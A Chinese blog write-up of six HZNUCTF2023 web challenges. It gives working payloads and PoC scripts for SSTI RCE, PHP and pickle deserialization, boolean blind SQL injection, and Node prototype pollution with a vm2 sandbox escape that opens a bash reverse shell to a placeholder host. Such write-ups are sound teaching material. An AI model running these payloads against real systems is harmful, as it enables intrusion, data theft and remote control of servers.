HZNUCTF2023 web

最新推荐文章于 2024-07-18 20:42:32 发布
最新推荐文章于 2024-07-18 20:42:32 发布
阅读量1.7k 收藏 4
点赞数 2
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63231007/article/details/130044576
版权
文章详细介绍了多个Web应用程序中的安全漏洞利用技术,包括SQL注入、无过滤的SSTI漏洞利用、cookie泄露与反序列化攻击、布尔型盲注、pickle反序列化漏洞以及Node.js应用中的原型链污染。每个漏洞都提供了详细的利用步骤和POC(ProofofConcept)代码,展示了攻击者如何通过这些漏洞执行命令、获取敏感信息或控制应用程序。
摘要由CSDN通过智能技术生成

目录

<1> guessguessguess

<2> ezflask(无过滤ssti)

​ <3> ppppop(cookie泄露+反序列化)

<4> ezlogin(bool盲注)

<5> ezpickle(pickle反序列化)

<6> eznode(原型链污染)

<1> guessguessguess

尝试是否存在sql注入,发现他会对内容进行倒叙  框里有一个hint 我们试着 传入 tnih 看看有什么

金 "命令执行" 同时参数名为 cmd 应该是命令执行

ls /看一下,没找到flag 

最后执行 env flag在环境变量里

<?php
$userArr = array("username: admin<br>password: admin","username: docker<br>password: docker", "username: mxx307<br>password: mxxxxxxx3333000777", "username: FLAG_IN_HERE<br>password: 不给你看");

$cmd = strrev($_POST['cmd']);
if($cmd != 'hint' && $cmd != 'phpinfo'){
    echo "your SQL: SELECT * FROM users WHERE id=$cmd";
    echo "<br>";
}
if($cmd == "phpinfo") {
    eval('phpinfo();');
} else if(preg_match('/127.0.0.1/',$cmd) && !preg_match('/;|&/',$cmd )) {
    system('ping '.$cmd);
} else if($cmd == "hint") {
    echo '可爱的CTFer哟,你掉的是这个金"命令执行",还是这个银"XSS"还是这个普通的"SQL注入"呢?';
}else if(preg_match('/^\d$/',$cmd, $matches)) {
    if($matches[0] <= 4 && $matches[0] >= 1){
        echo $userArr[$matches[0] - 1];
    } else {
        echo "no user";
    }
}else {
    echo "猜猜猜";
}

<2> ezflask(无过滤ssti)

结合名称 + 提示 /?name= 应该是考察SSTI

传入?name=123 看看 

和guess差不多,依然是倒序 传入 }}7*7{{ 得到回显是49

在线文本反转_字符串反转_实时逆序字符串文本_汇享在线工具箱 

找基类 下面的记得反转

{{"".__class__}} 得到空字符串类 <class 'str'>

 {{"".__class__.__mro__}}  得到:<class 'tuple'>, <class 'object'>

 {{"".__class__.__mro__[-1]}} 得到 <class 'object'>

得到基类之后,找到这个基类的子类集合

{{"".__class__.__mro__[-1].__subclasses__()}}

这里使用其第133个类([0]是第一个类 因此第133个是[132] )<class 'os._wrap_close'>

<class 'os._wrap_close'> 这个类有个popen方法可以执行系统命令

实例化我们找到的类对象

 {{"".__class__.__mro__[-1].__subclasses__()[132].__init__}}

找到这个实例化对象的所有方法

{{"".__class__.__mro__[-1].__subclasses__()[132].__init__.__globals__}} 

调用popen方法,进行rce 在环境变量里得到flag

{{"".__class__.__mro__[-1].__subclasses__()[132].__init__.__globals__['popen']('env').read()}}

<3> ppppop(cookie泄露+反序列化)

进去一片空白,在cookie中发现了一串base64编码

Cookie:user=Tzo0OiJVc2VyIjoxOntzOjc6ImlzQWRtaW4iO2I6MDt9

解码后得到一串序列化格式的字符串:O:4:"User":1:{s:7:"isAdmin";b:0;}

应该是判断是否Admin 这里bool值为0 所以空白 改为1 base64加密后放到cookie里访问试试

Tzo0OiJVc2VyIjoxOntzOjc6ImlzQWRtaW4iO2I6MTt9

得到源码:

<?php
error_reporting(0);
include('utils.php');

class A {
    public $className;
    public $funcName;
    public $args;

    public function __destruct() {
        $class = new $this->className;
        $funcName = $this->funcName;
        $class->$funcName($this->args);
    }
}

class B {
    public function __call($func, $arg) {
        $func($arg[0]);
    }
}

if(checkUser()) {
    highlight_file(__FILE__);
    $payload = strrev(base64_decode($_POST['payload']));
    unserialize($payload);
}

就一个节点,很短的链子:A::__destruct() => B::__call()

利用点在于 触发 __call() 

__call() 在一个对象的上下文中,如果调用的方法不存在的时候,它将被触发

 poc如下:

<?php
class A {
    public $className;
    public $funcName;
    public $args;
}

class B {

}
$a = new A();
$b = new B();
$a->className = $b;
$a->funcName = "system";
$a->args = "env";
echo base64_encode(strrev(serialize($a)));
?>

注:记得带着构造好的cookie

<4> ezlogin(bool盲注)

题目进去之后 是一个登录框 源码里给出了一部分过滤的关键词

同时,可以知道传入的username参数 是经过base64解码翻转才得到的

$username = strrev(base64_decode($_POST['username']));
$username = preg_replace('/select|union|and|database/', "hznuctf2023", $username);

这样的话,写脚本就麻烦一些了 我们先fuzz一下看看还有没有过滤其他的关键词

 like   or    #   ord   if   left   right  ||  ^  >  < 等都没被过滤

1'/**/or/**/1/**/like/**/1#

 为真的话 就回显:success!! you are the best web手

假: username or password is invalid

可以以此盲注

preg_replace可以大写绕过,SELECT DATABASE

 poc脚本如下:

import base64
import requests
import time

s = requests.session()
url = "http://node2.anna.nssctf.cn:28876/"
flag = ''
i=0
while True:
    i = i + 1
    Max = 128
    Min = 32
    Mid = (Max + Min) // 2
    while Min < Max:
        #payload = "1^(substr(database(),{},1)='{}')^1".format(i,j)
        #payload = "1'/**/or/**/(ord(substr(DATABASE(),{},1))/**/>/**/{})#".format(i,Mid)
        #payload = "1'/**/or/**/(ord(substr((SELECT/**/GROUP_CONCAT(TABLE_NAME)/**/FROM/**/INFORMATION_SCHEMA.TABLES/**/WHERE/**/TABLE_SCHEMA/**/like/**/'users'),{},1))/**/>/**/{})#".format(i,Mid)
        #payload = "1'/**/or/**/(ord(substr((SELECT/**/GROUP_CONCAT(COLUMN_NAME)/**/FROM/**/INFORMATION_SCHEMA.COLUMNS/**/WHERE/**/TABLE_NAME/**/like/**/'user'),{},1))/**/>/**/{})#".format(i, Mid)
        payload = "1'/**/or/**/(ord(substr((SELECT/**/GROUP_CONCAT(Password)/**/FROM/**/user),{},1))/**/>/**/{})#".format(i, Mid)

        payload = base64.b64encode(payload[::-1].encode('utf-8')).decode('utf-8')
        data={
            'username':payload
        }
        r = requests.post(url=url,data=data)
        if "success" in r.text:
            Min = Mid + 1
            Mid = (Min + Max) // 2
        else:
            Max = Mid
            Mid = (Min + Max) // 2

    flag = flag + chr(Mid)
    if Mid == 32:
        break
    print(flag)
    # 速度太快显示不完全
    time.sleep(0.5)

数据库为:users 表名为:user 字段得到:Host,User,Password,Select_priv,Insert_priv等等

<5> ezpickle(pickle反序列化)

import base64
import pickle
from flask import Flask, request

app = Flask(__name__)


@app.route('/')
def index():
    with open('app.py', 'r') as f:
        return f.read()


@app.route('/calc', methods=['GET'])
def getFlag():
    payload = request.args.get("payload")
    pickle.loads(base64.b64decode(payload).replace(b'os', b''))
    return "ganbadie!"


@app.route('/readFile', methods=['GET'])
def readFile():
    filename = request.args.get('filename').replace("flag", "????")
    with open(filename, 'r') as f:
        return f.read()


if __name__ == '__main__':
    app.run(host='0.0.0.0')

可以看到在 /calc路由  可以get传入payload参赛,会被 pickle.loads()  存在pickle反序列化

题目中过滤了os,我们使用字符串拼接绕过.

题目中还有一个读文件的路由,那么我们就将我们想要得知的命令执行的结果通过tee写到a中,然后通过/readFile路由读取命令执行结果

poc如下:

import pickle
import base64

class A():
    def __reduce__(self):
        return (eval,("__import__('o'+'s').system('env | tee a')",))

a = A()
b = pickle.dumps(a)
print(base64.b64encode(b))

也可以用 exec来命令执行,import一下base64 对命令编码一下

def __reduce__(self):
        cmd = f'import base64; exec(base64.b64decode("{encoded_payload}"));'
        return exec, (cmd,)

如果靶机不出网的话还可以用os.popen结合time.sleep盲注(姿势太多了)

<6> eznode(原型链污染)

 进去之后 得到提示:

POST some json shit to /. no source code and try to find source code

一般nodejs网站的源文件是app.js 访问 /app.js 得到源码


const express = require('express');
const app = express();
const { VM } = require('vm2');

app.use(express.json());

const backdoor = function () {
    try {
        new VM().run({}.shellcode);
    } catch (e) {
        console.log(e);
    }
}

const isObject = obj => obj && obj.constructor && obj.constructor === Object;
const merge = (a, b) => {
    for (var attr in b) {
        if (isObject(a[attr]) && isObject(b[attr])) {
            merge(a[attr], b[attr]);
        } else {
            a[attr] = b[attr];
        }
    }
    return a
}
const clone = (a) => {
    return merge({}, a);
}


app.get('/', function (req, res) {
    res.send("POST some json shit to /.  no source code and try to find source code");
});

app.post('/', function (req, res) {
    try {
        console.log(req.body)
        var body = JSON.parse(JSON.stringify(req.body));
        var copybody = clone(body)
        if (copybody.shit) {
            backdoor()
        }
        res.send("post shit ok")
    }catch(e){
        res.send("is it shit ?")
        console.log(e)
    }
})

app.listen(3000, function () {
    console.log('start listening on port 3000');
});

审计一下

这里存在backdoor方法,其中创建了一个VM环境,将shellcode属性放在其中执行,这里存在vm沙箱逃逸 利用原型链污染 写入shellcode执行

const backdoor = function () {
    try {
        new VM().run({}.shellcode);
    } catch (e) {
        console.log(e);
    }
}

再看一下,怎么执行这个backdoor() 方法 发现需要满足 copybody.shit 值为true

app.post('/', function (req, res) {
    try {
        console.log(req.body)
        var body = JSON.parse(JSON.stringify(req.body));
        var copybody = clone(body)
        if (copybody.shit) {
            backdoor()
        }
        res.send("post shit ok")
    }catch(e){
        res.send("is it shit ?")
        console.log(e)
    }
})

可以看到 copybody属性执行了一次clone,跟进clone 典型的merge的原型链污染

const isObject = obj => obj && obj.constructor && obj.constructor === Object;
const merge = (a, b) => {
    for (var attr in b) {
        if (isObject(a[attr]) && isObject(b[attr])) {
            merge(a[attr], b[attr]);
        } else {
            a[attr] = b[attr];
        }
    }
    return a
}
const clone = (a) => {
    return merge({}, a);
}

因此我们这里的思路就是需要传入一个json格式的shit属性,其值为1即可,然后通过原型链污染,将shellcode属性赋值为恶意代码,最后的payload如下

{"shit": "1", "__proto__": {"shellcode": "let res = import('./app.js')\n    res.toString.constructor(\"return this\")\n    ().process.mainModule.require(\"child_process\").execSync('bash -c \"bash -i >& /dev/tcp/vps/ip 0>&1\"').toString();"}}

注:请求头需要为Content-Type: application/json

葫芦娃42
关注
CTF题型 Python中pickle反序列化进阶利用&amp;例题&amp;opache绕过(1)
2401_84009579的博客
04-20 982
机构动则几千的学费,着实压力不小。自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!**
CTF题型 Python中pickle反序列化进阶利用&amp;例题&amp;opache绕过
m0_60607895的博客
05-05 1070
我们在看视频学习的时候,不能光动眼动脑不动手,比较科学的学习方法是在理解之后运用它们,这时候练手项目就很适合了,只是里面的项目比较多,水平也是参差不齐,大家可以挑自己能做的项目去练练。这是我花了几天的时间去把Python所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。它可以在对象从其序列化状态恢复时,对对象进行自定义的状态还原。构造方法,在反序列化的时候自动执行,类似于php中的_常用payload(没有os模块)
HZNUCTF2023初赛web
jayq1的博客
03-28 487
这里只是两行分开写了,其实在一块,schemata),{},1))>{}#这个中括号的地方传入参数。发现最后的判断是false 对应0 所以把0改成1然后base64 加密得到新的cookie。3.此外空格也会被检测需要/**/进行绕过,否则会被检测出hacker。查询列名:发现可疑的id, username, password。一开始考虑过用bp,但是因为加密和翻转的限制,利用bp不方便。首先进入页面时空白的界面,去查看网页源代码也是空的。会发现出现成功的信息,表明查询的信息是正确的。
hznuCTF eznode
m0_64348326的博客
07-04 237
4.谷歌搜索该漏洞的exp:https://xz.aliyun.com/t/11859#toc-5。然后json格式发送即可。2.审计源码,挺简单的。大概就是在页面post传递一个json数据,会经过。变量中,最后判断该变量的shit值是否为真,然后调用。属性的内容,那么也就是我们需要将该属性污染成。1.页面提示尝试查看源码,最直观的就是。配置错误造成的源码泄露了,直接访问。函数很明显的一个原型链污染,而。函数在VM2沙箱中执行。函数解析,然后再通过。
HZNUCTF2023web相关题目
最新发布
2302_78903258的博客
07-18 956
得到源码后就是反序列化构造pop链了,不难看出是通过A类来触发B类中的__call从而实现任意命令,执行后的回显肯定是在class B的__call 魔术方法里,所以我们需要让func和arg成为我们需要的变量。解码之后发现字符串中有一个布尔值,空白原因可能是布尔值为0,一般来说0表示false,我们将0修改为1再进行base64编码,再将编码后的值替代之前cookie值发包。接着给出提示/bin/bash,接着我们构造payload,看看此文件,发现出现2个文件 ,查询文件无果。filename=a。
HZNUCTF2023初赛
Emmaaaaa's blog
03-27 1687
cpdd:摩斯密码 classical:base + 凯撒 child_OTP:异或 child_quadratic_residue:直接开根法 child_proof_work:暴力破解uuid4{8位 - 4位 - 4位 - 12位} chile_steam:异或 child_RSA:基础RSA解密 RSA1:维纳攻击 很简单的数学1:离散对数(discrete_log) child_gcd:费马小定理 (a ** (p-1) = 1 mod p) RSA3:模运算法则,离散对数
NSSCTF-[HZNUCTF 2023 preliminary]-web
J1ng_Hong的博客
11-13 537
进题发现没有回显,我试着用dirsearch,发现找到的三个网页都是没有回显的。进题看到输入框,并且下面的提示看起来想sql注入,随便输了几次,发现只有数字1、2、3、4有回显,并且输入会逆向。它最后的回显肯定是在class B的__call 魔术方法里,所以我们需要让func和arg成为我们需要的变量。由于序列化中的b代表着Boolean,所以我试着把0改为1。然后我们就看到了回显,但是没找到flag。
[HZNUCTF 2023 preliminary] 2023杭师大校赛(初赛) web方向题解wp 全
Jay17的博客
08-16 1410
[HZNUCTF 2023 preliminary] 2023杭师大校赛(初赛) web方向题解wp 全
CTF web题 wp:
weixin_45694388的博客
10-11 1062
1.签到题 火狐F12查看源码,发现注释: 一次base64解码出flag 2.Encode 在这里插入图片描述 和第一题界面一样?? 轻车熟路f12: 发现编码: 格式看上去是base64,连续两次base64后,观察格式后发现是hex编码,解码出flag 3.Decoede me 一道php的加密题 strrev(): 逆序 substr(): 返回字符串第0以后的1位ord():ord()函数返回字符串的首个字符的ASCII值。chr():从ascii表返回第_0以后的1位 ord(): or
CTF-REVERSE练习之逆向初探
ChuMeng1999的博客
11-26 3297
目录预备知识一、了解REVERSE二、PEiD三、Ollydbg四、IDA实验目的实验环境实验步骤一实验步骤二实验步骤三 预备知识 一、了解REVERSE REVERSE是CTF竞赛中的一种常见题目类型,主要考察参赛选手逆向工程相关的知识,考查形式为通过对一个二进制程序(exe、dll或者是elf等)进行逆向分析,了解程序内部的实现机制,最终目的可能是得到一个密码,或者是编写一个注册机用于计算指定用户名对应的注册码等。 二、PEiD PEiD是一款著名的查壳工具,其功能十分强大,几乎可以侦测出绝大部分的壳以
[HZNUCTF 2023 preliminary]ppppop
qq_73767109的博客
06-10 482
这里在B类中调用system没有,直接触发__call方法并将system作为参数传入__call中造成执行系统命令来查看环境变量从而得到flag。得到源码后就是反序列化构造pop链了,不难看出是通过A类来触发B类中的__call从而实现任意命令执行。一片空白的原因可能就是布尔值为0,改成1再base64加密后替换原cookie发包。解码发现是序列化后的字符串而且有一个布尔类型的变量为0。打开一片空白,抓包发现base64加密后的cookie。
HZNUCTF2023部分wp-Reverse
m0_73393932的博客
04-04 829
逆向
buuctf--easyflask
qq_46263951的博客
01-04 891
根据提示访问/file?file=index.js,可以看到提示源码在/app/source #!/usr/bin/python3.6 import os import pickle from base64 import b64decode from flask import Flask, request, render_template, session app = Flask(__name__) app.config["SECRET_KEY"] = "*******" User = type
pickle反序列化
rev1ve的博客
12-22 1604
PHP类似,python也有序列化功能以长期储存内存中的数据。pickle是python下的序列化与反序列化包。python有另一个更原始的序列化包marshal,现在开发时一般使用pickle。与json相比,pickle以二进制储存,不易人工阅读;json可以跨语言,而pickle是Python专用的;pickle能表示python几乎所有的类型(包括自定义类型),json只能表示一部分内置类型且不能表示自定义类型。
NSSCTF做题第9页(2)
wwwwyyyrre的博客
10-25 382
这道题主要有三个绕过点,第一个是__wakeup()函数,第二个是变量的MD5相等,但是两个变量不等那需要我们构造的两个类就是class lt和class fin构造的时候设置一个变量a,创建了一个类的对象lt然后把md5的条件满足一下,而这类的第一个变量$impo没有用到就可以利用它来指向下一个新创建的变量class fin,再利用fin里边的公共变量进行命令执行得到flagphpclass ltclass finpublic $a;
HSCSEC CTF 2023 web-EZSYFLASK-wp
……
02-24 306
flask的PIN码攻击
HSCSEC 2023 个人练习
weixin_44770698的博客
02-19 753
HSCSEC 2023 练习
DASCTF 2023 & 0X401七月暑期挑战赛web复现
weixin_63231007的博客
08-02 1293
python原型链污染&xpath注入&pearcmd文件包含&django框架
NSSCTF第13页(3)
wwwwyyyrre的博客
11-29 219
所以注册用户admin'--并修改密码就可以登录admin,在home页面的查询有两种回显,exist或no user,显然是布尔盲注,需要注意的是数据库是sqlite,查询语句不太一样。print(("%s表的%s字段数据: " + data) % (tab_name, col_name))先注册一个admin'--+ 因为admin'#报错了,用这个注册的admin来覆盖之前的那个admin。#使用时改一下Success_message、url!tbl_name:记录所从属的表名,如索引所在的表名。
Web】NodeJs相关例题wp
uuzeray的博客
11-21 403
浏览器内部使用32位带符号的整数来储存推迟执行的时间这意味着setTimeout最多延迟2147483647ms。只要大于2147483647,就会发生溢出,就可以绕过那个时间限制,进入下一个路由。根据读到的package包引用,发现lodash版本为4.17.16。我们传入一个delay和原先定义的60000进行比较。大的值复制给delay。简单审一下,污染system_open为yes就可以拿flag。但是我们的代码不能超时6秒。表单提交个D0g3_Yes!给到版本号,敏感的weber已经有想法了(
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值